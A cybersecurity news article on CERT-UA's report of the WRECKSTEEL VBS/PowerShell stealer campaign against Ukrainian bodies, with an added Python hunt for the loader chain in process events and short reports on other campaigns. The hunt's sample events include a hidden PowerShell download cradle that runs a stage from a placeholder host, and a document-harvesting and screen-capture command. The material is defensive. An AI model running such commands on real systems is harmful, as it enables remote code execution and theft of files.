The Computer Emergency Response Team of Ukraine (CERT-UA) has revealed that at least three cyber attacks were recorded against state administration bodies and critical infrastructure facilities in the country with the aim of stealing sensitive data.
The campaign, the agency said, involved the use of compromised email accounts to send phishing messages containing links pointing to legitimate services like DropMeFiles and Google Drive. In some instances, the links are embedded within PDF attachments.
The digital missives sought to induce a false sense of urgency by claiming that a Ukrainian government agency planned to cut salaries, urging the recipient to click on the link to view the list of affected employees.
Visiting these links leads to the download of a Visual Basic Script (VBS) loader that's designed to fetch and execute a PowerShell script capable of harvesting files matching a specific set of extensions and capturing screenshots.
The activity, attributed to a threat cluster tracked as UAC-0219, is said to have been ongoing since at least fall 2024, with early iterations using a combination of EXE binaries, a VBS stealer, and a legitimate image editor called IrfanView to achieve its goals.
CERT-UA has given the VBS loader and the PowerShell malware the moniker WRECKSTEEL. The attacks have not been attributed to any nation.
The cyber attacks follow the discovery of a phishing campaign that has focused on defense and aerospace entities with links to the ongoing conflict in Ukraine to harvest webmail credentials via fake login pages.
"The attackers appear to have built the page using Mailu, an open-source mail server software available on GitHub," the DomainTools Investigations (DTI) team said.
"The focus on spoofing organizations involved in Ukraine's defense and telecommunications infrastructure further suggests an intent to gather intelligence related to the conflict in Ukraine. Notably, many of the spoofed defense, aerospace, and IT companies have provided support to Ukraine's military efforts in its war with Russia."
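The loader chain described above (a script host running a VBS file, which spawns PowerShell to pull a second stage that enumerates documents and grabs the screen) leaves a recognisable parent-child pattern in process-creation telemetry. The hunt below is an added example written for this page, not code from CERT-UA or from the WRECKSTEEL samples; the event records, process IDs, paths and the `example.invalid` URL are constructed to look like Sysmon Event ID 1 entries reduced to the fields the hunt reads, and the field names (`pid`, `parent_pid`, `image`, `parent_image`, `command_line`) are assumptions about how a collector would expose them.

```python
"""Hunt for a WRECKSTEEL-style chain (script host -> PowerShell download cradle
-> document harvesting / screenshot) in Windows process-creation events.

Added example; the events are constructed, not telemetry from the CERT-UA report.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Download cradles commonly used by VBS/PowerShell loaders to fetch a second stage.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|invoke-restmethod|"
    r"\biwr\b|\birm\b|net\.webclient|start-bitstransfer", re.I)
# Flags that hide the window, bypass execution policy, or pass an encoded command.
EVASION_RE = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|"
    r"-e(xecutionpolicy|p)\s+bypass", re.I)
# Recursive enumeration filtered on several document/image extensions (stealer behaviour).
ENUM_RE = re.compile(r"get-childitem|\bgci\b", re.I)
DOC_EXT_RE = re.compile(r"\*\.(docx?|xlsx?|pptx?|pdf|rtf|txt|odt|jpe?g|png)\b", re.I)
# .NET screen capture invoked from PowerShell.
SCREENSHOT_RE = re.compile(r"copyfromscreen|system\.drawing", re.I)

# Constructed sample events (assumed field layout; PIDs, paths and URL are placeholders).
SAMPLE_EVENTS = [
    {"pid": 4412, "parent_pid": 1200, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Downloads\staff_list.vbs"'},
    {"pid": 4420, "parent_pid": 4412,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'''powershell.exe -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"'''},
    {"pid": 5100, "parent_pid": 4420,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'''powershell.exe -c "Get-ChildItem $env:USERPROFILE -Recurse -Include *.doc,*.docx,*.pdf,*.xls,*.xlsx | Compress-Archive -DestinationPath $env:TEMP\out.zip; Add-Type -AssemblyName System.Drawing; $g.CopyFromScreen(0,0,0,0,$bmp.Size)"'''},
    {"pid": 6200, "parent_pid": 1200,  # benign admin one-liner, should not fire
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'powershell.exe -c "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"'},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events):
    """Per-event indicators; returns only events that matched at least one."""
    findings = []
    for ev in events:
        image, parent, cmd = basename(ev["image"]), basename(ev["parent_image"]), ev["command_line"]
        reasons = []
        if image in POWERSHELL:
            if parent in SCRIPT_HOSTS:
                reasons.append("powershell spawned by script host")
            if DOWNLOAD_RE.search(cmd):
                reasons.append("download cradle")
            if EVASION_RE.search(cmd):
                reasons.append("hidden/bypass/encoded flags")
            # Two or more distinct document extensions in one enumeration is the stealer pattern.
            if ENUM_RE.search(cmd) and len(set(m.lower() for m in DOC_EXT_RE.findall(cmd))) >= 2:
                reasons.append("bulk document enumeration")
        if SCREENSHOT_RE.search(cmd):
            reasons.append("screen capture API")
        if reasons:
            findings.append({"pid": ev["pid"], "image": image, "reasons": reasons})
    return findings


def reconstruct_chains(events):
    """Follow parent_pid links from every script-host process to its descendants."""
    chains = []
    for root in events:
        if basename(root["image"]) not in SCRIPT_HOSTS:
            continue
        chain, frontier, seen = [root["pid"]], [root["pid"]], {root["pid"]}
        while frontier:
            frontier = [e["pid"] for e in events
                        if e.get("parent_pid") in frontier and e["pid"] not in seen]
            seen.update(frontier)
            chain.extend(frontier)
        chains.append(chain)
    return chains


def summarize(events):
    """Union of indicators along each script-host chain, so the loader and the
    second stage are judged together rather than as isolated command lines."""
    reasons_by_pid = {f["pid"]: set(f["reasons"]) for f in hunt(events)}
    out = []
    for chain in reconstruct_chains(events):
        union = set()
        for pid in chain:
            union |= reasons_by_pid.get(pid, set())
        out.append({"chain": chain, "reasons": sorted(union)})
    return out


if __name__ == "__main__":
    for item in summarize(SAMPLE_EVENTS):
        print(item)
```

The per-event checks alone would also flag a legitimate admin who pipes `Invoke-WebRequest` into a hidden window; the chain view is what separates the loader pattern (script host, then a download cradle, then a child that sweeps `*.doc`/`*.pdf` and touches the screen-capture API) from one-off noise, which is why `summarize` is the function to alert on.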

Russia-aligned intrusion sets such as UAC-0050 and UAC-0006 have also been observed carrying out financially and espionage motivated spam campaigns since the start of 2025, primarily targeting various verticals such as governments, defense, energy, and NGOs, to distribute malware families like sLoad, Remcos RAT, NetSupport RAT, and SmokeLoader.
The development comes as Kaspersky warned that the threat actor known as Head Mare has targeted several Russian entities with a malware called PhantomPyramid that's capable of processing instructions issued by the operator over a command-and-control (C2) server, as well as downloading and running additional payloads like MeshAgent.
Russian energy companies, industrial enterprises, and suppliers and developers of electronic components have also been on the receiving end of phishing attacks mounted by a threat actor codenamed Unicorn that dropped a VBS trojan designed to siphon files and images from infected hosts.
Late last month, SEQRITE Labs revealed that academic, governmental, aerospace, and defense-related networks in Russia are being targeted by weaponized decoy documents, likely sent via phishing emails, as part of a campaign dubbed Operation HollowQuill. The attacks are believed to have started around December 2024.

The activity uses social engineering ploys, disguising malware-laced PDFs as research invitations and government communiqués to entice unsuspecting users into triggering the attack chain.
"The threat entity delivers a malicious RAR file which contains a .NET malware dropper, which further drops a Golang-based shellcode loader along with the legitimate OneDrive application and a decoy-based PDF with a final Cobalt Strike payload," security researcher Subhajeet Singha said.